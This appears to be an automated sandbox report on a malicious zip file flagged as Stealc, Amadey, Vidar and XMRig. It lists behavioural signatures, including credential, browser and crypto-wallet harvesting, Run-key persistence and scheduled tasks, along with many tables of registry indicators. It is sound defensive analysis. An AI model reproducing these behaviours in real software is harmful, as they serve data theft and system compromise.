Analysis Overview
SHA256
db8d654ded56316bb7d7fac13ef36272abebc07c145791d638f1355bdbbc4d72
Threat Level: Known bad
The file SETAP_9191__PA$$W0rdS~!^!.zip was found to be: Known bad.
Malicious Activity Summary
Stealc
Amadey
xmrig
Vidar
Detect Vidar Stealer
XMRig Miner payload
Downloads MZ/PE file
Manipulates Digital Signatures
Modifies system executable filetype association
Executes dropped EXE
Reads user/profile data of local email clients
Reads user/profile data of web browsers
Registers COM server for autorun
Checks computer location settings
UPX packed file
Loads dropped DLL
Reads data files stored by FTP clients
Checks installed software on the system
Adds Run key to start application
Accesses cryptocurrency files/wallets, possible credential harvesting
Suspicious use of SetThreadContext
Checks system information in the registry
Drops file in Windows directory
Enumerates physical storage devices
Delays execution with timeout.exe
Enumerates system info in registry
Suspicious behavior: AddClipboardFormatListener
Runs regedit.exe
Modifies data under HKEY_USERS
Uses Task Scheduler COM API
Uses Volume Shadow Copy service COM API
Suspicious use of SendNotifyMessage
Suspicious behavior: MapViewOfSection
Modifies system certificate store
NTFS ADS
Suspicious use of WriteProcessMemory
Modifies registry class
Modifies Internet Explorer settings
Suspicious use of SetWindowsHookEx
Checks processor information in registry
Suspicious use of FindShellTrayWindow
Suspicious use of AdjustPrivilegeToken
Suspicious behavior: EnumeratesProcesses
Suspicious behavior: LoadsDriver
Suspicious behavior: GetForegroundWindowSpam
Checks SCSI registry key(s)
Uses Volume Shadow Copy WMI provider
Analysis: static1
Detonation Overview
Reported
2024-06-17 18:26
Analysis: behavioral1
Detonation Overview
Submitted
2024-06-17 18:26
Reported
2024-06-17 18:47
Platform
win10v2004-20240508-en
Max time kernel
1199s
Max time network
1201s
Signatures
Detect Vidar Stealer
Stealc
Vidar
Downloads MZ/PE file
Manipulates Digital Signatures
| Description | Indicator | Process | Target |
|---|---|---|---|
| Key deleted | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs | C:\Windows\regedit.exe | N/A |
| Key deleted | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs | C:\Windows\regedit.exe | N/A |
| Key deleted | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs | C:\Windows\regedit.exe | N/A |
| Key deleted | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs | C:\Windows\regedit.exe | N/A |
| Key deleted | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust | C:\Windows\regedit.exe | N/A |
| Key deleted | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs | C:\Windows\regedit.exe | N/A |
| Key deleted | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs | C:\Windows\regedit.exe | N/A |
| Key deleted | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople | C:\Windows\regedit.exe | N/A |
| Key deleted | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs | C:\Windows\regedit.exe | N/A |
| Key deleted | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates | C:\Windows\regedit.exe | N/A |
| Key deleted | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing | C:\Windows\regedit.exe | N/A |
| Key deleted | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates | C:\Windows\regedit.exe | N/A |
| Key deleted | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates | C:\Windows\regedit.exe | N/A |
| Key deleted | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust | C:\Windows\regedit.exe | N/A |
| Key deleted | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople | C:\Windows\regedit.exe | N/A |
| Key deleted | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs | C:\Windows\regedit.exe | N/A |
| Key deleted | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates | C:\Windows\regedit.exe | N/A |
Checks computer location settings
| Description | Indicator | Process | Target |
|---|---|---|---|
| Key value queried | \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\dcom.au3 | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
|---|---|---|---|
| N/A | N/A | C:\ProgramData\CAFIJKFHIJ.exe | N/A |
| N/A | N/A | C:\ProgramData\CAFHIJDHDG.exe | N/A |
Loads dropped DLL
| Description | Indicator | Process | Target |
|---|---|---|---|
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\dcom.au3 | N/A |
Modifies system executable filetype association
| Description | Indicator | Process | Target |
|---|---|---|---|
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\exefile\shellex\PropertySheetHandlers | C:\Windows\regedit.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\batfile\DefaultIcon | C:\Windows\regedit.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\comfile\shell\open\command | C:\Windows\regedit.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\lnkfile\CLSID | C:\Windows\regedit.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\batfile\shell\print | C:\Windows\regedit.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\lnkfile\shellex | C:\Windows\regedit.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\piffile\shellex\IconHandler | C:\Windows\regedit.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\exefile\shell\runas\command | C:\Windows\regedit.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\exefile\shell\runasuser | C:\Windows\regedit.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\exefile\shell | C:\Windows\regedit.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\exefile\shellex\ContextMenuHandlers | C:\Windows\regedit.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\batfile\shell | C:\Windows\regedit.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\comfile\shell | C:\Windows\regedit.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\exefile\shell\open\command | C:\Windows\regedit.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\exefile\shell\runasuser\command | C:\Windows\regedit.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\piffile\shell | C:\Windows\regedit.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\batfile\shell\runas\command | C:\Windows\regedit.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\exefile\shell\open | C:\Windows\regedit.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\exefile\shellex | C:\Windows\regedit.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\lnkfile\shellex\IconHandler | C:\Windows\regedit.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\batfile\shell\edit | C:\Windows\regedit.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\batfile\shell\open | C:\Windows\regedit.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\batfile\shellex | C:\Windows\regedit.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\exefile\shellex\DropHandler | C:\Windows\regedit.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\batfile\shell\print\command | C:\Windows\regedit.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\lnkfile\shellex\ContextMenuHandlers\{00021401-0000-0000-C000-000000000046} | C:\Windows\regedit.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\batfile\shellex\DropHandler | C:\Windows\regedit.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\comfile\DefaultIcon | C:\Windows\regedit.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\comfile\shellex | C:\Windows\regedit.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\lnkfile\shellex\ContextMenuHandlers\OpenContainingFolderMenu | C:\Windows\regedit.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\piffile\shell\open\command | C:\Windows\regedit.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\lnkfile\tabsets | C:\Windows\regedit.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\piffile\shell\open | C:\Windows\regedit.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\piffile\shellex\DropHandler | C:\Windows\regedit.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\batfile\shell\open\command | C:\Windows\regedit.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\batfile\shellex\PropertySheetHandlers | C:\Windows\regedit.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\exefile\DefaultIcon | C:\Windows\regedit.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\exefile\shell\runas | C:\Windows\regedit.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\exefile\shellex\ContextMenuHandlers\Compatibility | C:\Windows\regedit.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\exefile\shellex\ContextMenuHandlers\PintoStartScreen | C:\Windows\regedit.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\lnkfile\shellex\DropHandler | C:\Windows\regedit.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\batfile\shell\edit\command | C:\Windows\regedit.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\comfile\shell\open | C:\Windows\regedit.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\comfile\shellex\DropHandler | C:\Windows\regedit.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\lnkfile\shellex\ContextMenuHandlers | C:\Windows\regedit.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\lnkfile\shellex\PropertySheetHandlers | C:\Windows\regedit.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\batfile\shell\runas | C:\Windows\regedit.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\batfile\shell\runasuser | C:\Windows\regedit.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\batfile\shellex\{8895b1c6-b41f-4c1c-a562-0d564250836f} | C:\Windows\regedit.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\batfile\shellex\ContextMenuHandlers\Compatibility | C:\Windows\regedit.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\piffile\shellex | C:\Windows\regedit.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\batfile\shell\runasuser\command | C:\Windows\regedit.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\batfile\shellex\ContextMenuHandlers | C:\Windows\regedit.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\piffile\shellex\PropertySheetHandlers | C:\Windows\regedit.exe | N/A |
Reads data files stored by FTP clients
Reads user/profile data of local email clients
Reads user/profile data of web browsers
Registers COM server for autorun
| Description | Indicator | Process | Target |
|---|---|---|---|
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{CAFEEFAC-0018-0000-0058-ABCDEFFEDCBC}\InprocServer32 | C:\Windows\regedit.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{CAFEEFAC-0018-0000-0379-ABCDEFFEDCBB}\InprocServer32 | C:\Windows\regedit.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{CAFEEFAC-0014-0002-0021-ABCDEFFEDCBB}\InprocServer32 | C:\Windows\regedit.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{CAFEEFAC-0015-0000-0001-ABCDEFFEDCBB}\InprocServer32 | C:\Windows\regedit.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{CAFEEFAC-0015-0000-0029-ABCDEFFEDCBC}\InprocServer32 | C:\Windows\regedit.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0030-ABCDEFFEDCBA}\InprocServer32 | C:\Windows\regedit.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0123-ABCDEFFEDCBB}\InprocServer32 | C:\Windows\regedit.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{CAFEEFAC-0017-0000-0279-ABCDEFFEDCBC}\InprocServer32 | C:\Windows\regedit.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{CAFEEFAC-0017-0000-0320-ABCDEFFEDCBA}\InprocServer32 | C:\Windows\regedit.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{CAFEEFAC-0017-0000-0351-ABCDEFFEDCBB}\InprocServer32 | C:\Windows\regedit.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{CAFEEFAC-0018-0000-0247-ABCDEFFEDCBC}\InprocServer32 | C:\Windows\regedit.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{CAFEEFAC-0018-0000-0266-ABCDEFFEDCBB}\InprocServer32 | C:\Windows\regedit.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{8BD21D40-EC42-11CE-9E0D-00AA006002F3}\InprocServer32 | C:\Windows\regedit.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{CAFEEFAC-0015-0000-0004-ABCDEFFEDCBC}\InprocServer32 | C:\Windows\regedit.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{CAFEEFAC-0015-0000-0015-ABCDEFFEDCBA}\InprocServer32 | C:\Windows\regedit.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0211-ABCDEFFEDCBB}\InprocServer32 | C:\Windows\regedit.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{CAFEEFAC-0017-0000-0030-ABCDEFFEDCBC}\InprocServer32 | C:\Windows\regedit.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{0002E178-0000-0000-C000-000000000046}\InprocServer32 | C:\Windows\regedit.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{CAFEEFAC-0013-0001-0036-ABCDEFFEDCBA}\InprocServer32 | C:\Windows\regedit.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{CAFEEFAC-0014-0002-0025-ABCDEFFEDCBA}\InprocServer32 | C:\Windows\regedit.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{CAFEEFAC-0017-0000-0396-ABCDEFFEDCBB}\InprocServer32 | C:\Windows\regedit.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{CAFEEFAC-0018-0000-0234-ABCDEFFEDCBB}\InprocServer32 | C:\Windows\regedit.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{CAFEEFAC-0017-0000-0332-ABCDEFFEDCBB}\InprocServer32 | C:\Windows\regedit.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{CAFEEFAC-0018-0000-FFFF-ABCDEFFEDCBA}\InprocServer32 | C:\Windows\regedit.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{CAFEEFAC-0015-0000-0092-ABCDEFFEDCBA}\InprocServer32 | C:\Windows\regedit.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{CAFEEFAC-0018-0000-0172-ABCDEFFEDCBA}\InprocServer32 | C:\Windows\regedit.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{CAFEEFAC-0018-0000-0277-ABCDEFFEDCBB}\InprocServer32 | C:\Windows\regedit.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0063-ABCDEFFEDCBA}\InprocServer32 | C:\Windows\regedit.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{CAFEEFAC-0018-0000-0264-ABCDEFFEDCBC}\InprocServer32 | C:\Windows\regedit.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{CAFEEFAC-0018-0000-0320-ABCDEFFEDCBC}\InprocServer32 | C:\Windows\regedit.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{CAFEEFAC-0014-0002-0063-ABCDEFFEDCBB}\InprocServer32 | C:\Windows\regedit.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{CAFEEFAC-0017-0000-0282-ABCDEFFEDCBB}\InprocServer32 | C:\Windows\regedit.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{CAFEEFAC-0018-0000-0159-ABCDEFFEDCBC}\InprocServer32 | C:\Windows\regedit.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{CAFEEFAC-0014-0002-0065-ABCDEFFEDCBA}\InprocServer32 | C:\Windows\regedit.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0149-ABCDEFFEDCBC}\InprocServer32 | C:\Windows\regedit.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{CAFEEFAC-0017-0000-0001-ABCDEFFEDCBA}\InprocServer32 | C:\Windows\regedit.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{CAFEEFAC-0017-0000-0164-ABCDEFFEDCBC}\InprocServer32 | C:\Windows\regedit.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{CAFEEFAC-0017-0000-0246-ABCDEFFEDCBB}\InprocServer32 | C:\Windows\regedit.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{CAFEEFAC-0018-0000-0162-ABCDEFFEDCBC}\InprocServer32 | C:\Windows\regedit.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{00024505-0016-0000-C000-000000000046}\LocalServer32 | C:\Windows\regedit.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0100-ABCDEFFEDCBA}\InprocServer32 | C:\Windows\regedit.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{CAFEEFAC-0017-0000-0175-ABCDEFFEDCBC}\InprocServer32 | C:\Windows\regedit.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{CAFEEFAC-0017-0000-0399-ABCDEFFEDCBA}\InprocServer32 | C:\Windows\regedit.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{CAFEEFAC-0018-0000-0041-ABCDEFFEDCBA}\InprocServer32 | C:\Windows\regedit.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{3BE786A2-0366-4F5C-9434-25CF162E475F}\InprocServer32 | C:\Windows\regedit.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{CAFEEFAC-0017-0000-0126-ABCDEFFEDCBB}\InprocServer32 | C:\Windows\regedit.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{CAFEEFAC-0017-0000-0234-ABCDEFFEDCBA}\InprocServer32 | C:\Windows\regedit.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{CAFEEFAC-0017-0000-0255-ABCDEFFEDCBB}\InprocServer32 | C:\Windows\regedit.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{CAFEEFAC-0018-0000-0096-ABCDEFFEDCBB}\InprocServer32 | C:\Windows\regedit.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{CAFEEFAC-0018-0000-0274-ABCDEFFEDCBC}\InprocServer32 | C:\Windows\regedit.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{CAFEEFAC-0013-0001-0063-ABCDEFFEDCBB}\InprocServer32 | C:\Windows\regedit.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{CAFEEFAC-0018-0000-0251-ABCDEFFEDCBB}\InprocServer32 | C:\Windows\regedit.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{CAFEEFAC-0018-0000-0333-ABCDEFFEDCBA}\InprocServer32 | C:\Windows\regedit.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{40B783AC-9C9E-4F73-A1C3-E767FC211B2C}\LocalServer32 | C:\Windows\regedit.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{CAFEEFAC-0014-0002-0095-ABCDEFFEDCBA}\InprocServer32 | C:\Windows\regedit.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{CAFEEFAC-0015-0000-0055-ABCDEFFEDCBC}\InprocServer32 | C:\Windows\regedit.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{CAFEEFAC-0018-0000-0200-ABCDEFFEDCBB}\InprocServer32 | C:\Windows\regedit.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{CAFEEFAC-0014-0002-0051-ABCDEFFEDCBA}\InprocServer32 | C:\Windows\regedit.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{CAFEEFAC-0017-0000-0148-ABCDEFFEDCBB}\InprocServer32 | C:\Windows\regedit.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{CAFEEFAC-0018-0000-0107-ABCDEFFEDCBC}\InprocServer32 | C:\Windows\regedit.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{CAFEEFAC-0018-0000-0288-ABCDEFFEDCBB}\InprocServer32 | C:\Windows\regedit.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0165-ABCDEFFEDCBA}\InprocServer32 | C:\Windows\regedit.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{CAFEEFAC-0017-0000-0009-ABCDEFFEDCBC}\InprocServer32 | C:\Windows\regedit.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{CAFEEFAC-0018-0000-0352-ABCDEFFEDCBA}\InprocServer32 | C:\Windows\regedit.exe | N/A |
Accesses cryptocurrency files/wallets, possible credential harvesting
Checks installed software on the system
Suspicious use of SetThreadContext
Drops file in Windows directory
| Description | Indicator | Process | Target |
|---|---|---|---|
| File opened for modification | C:\Windows\ServiceState\WinHttpAutoProxySvc\Data\cachev3.dat | C:\Windows\system32\svchost.exe | N/A |
| File created | C:\Windows\Tasks\TWI Cloud Host.job | C:\Windows\SysWOW64\ftp.exe | N/A |
| File created | C:\Windows\Tasks\Watcher Com SH.job | C:\Windows\SysWOW64\ftp.exe | N/A |
Enumerates physical storage devices
Checks SCSI registry key(s)
| Description | Indicator | Process | Target |
|---|---|---|---|
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000 | C:\Windows\system32\taskmgr.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A | C:\Windows\system32\taskmgr.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\FriendlyName | C:\Windows\system32\taskmgr.exe | N/A |
Checks processor information in registry
| Description | Indicator | Process | Target |
|---|---|---|---|
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | C:\Windows\regedit.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1 | C:\Windows\regedit.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Signature | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Users\Admin\AppData\Local\Temp\dcom.au3 | N/A |
| Key enumerated | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor | C:\Windows\regedit.exe | N/A |
| Key queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | C:\Windows\regedit.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | C:\Windows\regedit.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor | C:\Windows\regedit.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor | C:\Windows\regedit.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Key queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor | C:\Windows\regedit.exe | N/A |
| Key queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1 | C:\Windows\regedit.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1 | C:\Windows\regedit.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
Delays execution with timeout.exe
| Description | Indicator | Process | Target |
|---|---|---|---|
| N/A | N/A | C:\Windows\SysWOW64\timeout.exe | N/A |
Enumerates system info in registry
| Description | Indicator | Process | Target |
|---|---|---|---|
| Key enumerated | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter | C:\Windows\regedit.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\DiskController\0 | C:\Windows\regedit.exe | N/A |
| Key queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\DiskController\0\DiskPeripheral | C:\Windows\regedit.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\DiskController\0\DiskPeripheral | C:\Windows\regedit.exe | N/A |
| Key queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\KeyboardController\0\KeyboardPeripheral | C:\Windows\regedit.exe | N/A |
